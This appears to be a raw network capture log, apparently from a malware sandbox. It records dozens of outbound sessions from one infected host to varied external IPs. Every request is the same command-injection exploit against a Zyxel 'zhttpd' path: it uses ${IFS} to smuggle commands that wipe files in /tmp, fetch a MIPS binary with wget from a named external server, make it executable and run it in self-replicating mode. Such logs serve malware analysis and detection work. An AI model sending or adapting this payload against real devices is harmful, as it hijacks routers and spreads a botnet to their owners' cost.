                                                Jan 29, 2024 07:07:56.501411915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6378192.168.2.2355282218.162.100.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501427889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6379192.168.2.2337570199.7.252.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501456976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6380192.168.2.2342014180.173.86.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501488924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6381192.168.2.2337074122.6.0.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501528978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6382192.168.2.235644051.251.148.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501560926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6383192.168.2.235237060.96.121.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501614094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6384192.168.2.234956232.57.24.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501671076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6385192.168.2.235016837.133.40.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501713991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6386192.168.2.2350426212.24.200.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501751900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6387192.168.2.23476704.211.104.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501801968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6388192.168.2.233847893.175.90.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501844883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6389192.168.2.2335658191.68.120.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501854897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6390192.168.2.2343730217.51.67.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501897097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6391192.168.2.233665847.226.105.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501928091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6392192.168.2.2358406211.117.192.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.501981020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6393192.168.2.23339344.90.98.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502022028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6394192.168.2.2360914186.253.170.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502063990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6395192.168.2.233925050.221.7.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502091885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6396192.168.2.2347696212.200.5.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502135038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6397192.168.2.2360684202.40.141.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502163887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6398192.168.2.23598585.197.84.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502201080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6399192.168.2.2343224196.35.163.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502234936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6400192.168.2.2358622164.33.201.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502270937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6401192.168.2.233637293.58.235.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502300024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6402192.168.2.2334886106.43.201.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502360106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6403192.168.2.233758247.243.108.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502396107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6404192.168.2.234774449.133.40.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502419949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6405192.168.2.2337506192.163.215.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502482891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6406192.168.2.23567581.0.182.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502513885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6407192.168.2.2336054184.162.149.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502566099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6408192.168.2.235069475.127.155.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502595901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6409192.168.2.234884475.59.237.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502636909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6410192.168.2.2360824156.67.96.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502641916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6411192.168.2.235612090.120.224.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502674103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6412192.168.2.2347442158.46.216.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502756119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6413192.168.2.234399243.251.7.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502778053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6414192.168.2.23506104.71.3.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502824068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6415192.168.2.2336560152.97.71.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502851009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6416192.168.2.2354992173.25.41.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502876997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6417192.168.2.2358962122.197.80.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502914906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6418192.168.2.2332844157.126.246.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502928972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6419192.168.2.235612673.193.197.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.502991915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6420192.168.2.235007090.83.91.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503036022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6421192.168.2.2348582156.49.65.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503082037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6422192.168.2.233653212.196.229.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503118038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6423192.168.2.2340462114.250.96.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503161907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6424192.168.2.235521481.218.224.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503174067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6425192.168.2.2339566101.95.206.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503211975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6426192.168.2.2360616151.141.30.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503268003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6427192.168.2.2334730105.214.94.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503305912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6428192.168.2.233521231.218.21.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503340006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6429192.168.2.2342318110.161.105.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503388882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6430192.168.2.233648877.185.166.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503417015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6431192.168.2.2341160194.34.199.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503451109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6432192.168.2.2342518188.219.142.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503510952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6433192.168.2.235476466.118.116.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503554106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6434192.168.2.234677842.193.157.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503588915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6435192.168.2.2345256185.235.230.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503633976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6436192.168.2.235407031.47.208.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503659964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6437192.168.2.2346898182.157.250.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503705978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6438192.168.2.233735077.142.249.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503762960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6439192.168.2.235218437.5.50.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503814936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6440192.168.2.235984414.124.99.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503829002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6441192.168.2.235457417.224.84.202443
                                                TimestampBytes transferredDirectionData
